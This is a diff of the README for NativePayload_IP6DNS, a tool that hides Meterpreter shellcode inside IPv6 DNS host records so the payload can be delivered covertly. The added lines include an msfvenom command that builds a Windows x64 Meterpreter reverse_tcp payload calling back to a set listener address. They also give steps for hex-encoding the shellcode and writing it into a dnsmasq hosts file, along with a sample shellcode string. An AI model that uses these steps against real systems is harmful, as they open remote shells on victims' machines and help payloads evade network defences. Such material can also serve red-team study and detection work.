DamonMohammadbagher/NativePayload_IP6DNS/README.md

 note : 10 bytes Payload ==> {fc48:83e4:f0e8:cc00:0000} and {:ae0} is payload counter or ID

+Example: msfvenum --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.113 -f c > /payload_string.txt

+Replace your Payload_strings.txt file  from "\0xfc\0x48\0x83..." to "fc4883..."

 syntax 1 : NativePayload_IP6DNS.exe null "payload string"

-description 1 : Making Hosts files for Linux Dns Server Like Dnsmasq or dnsspoof tools , copy output for this command to DNS Hosts file in linux you can use Msfvenom tool like example and copy your payload in "payload string"
+Description 1 : Making Hosts files for Linux Dns Server Like Dnsmasq or dnsspoof tools , copy output for this command to DNS Hosts file in linux you can use Msfvenom tool like example and copy your payload in "payload string"

 Example : payload string ==> fc4883e4f0e8cc000000415141505251564831d2ae1

-Example: msfvenum --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.113 -f c > /dnsmasq.hosts
+Example: NativePayload_IP6DNS.exe null "payload string" > /dnsmasq.hosts

 after this command you have something like these lines in your Hosts file :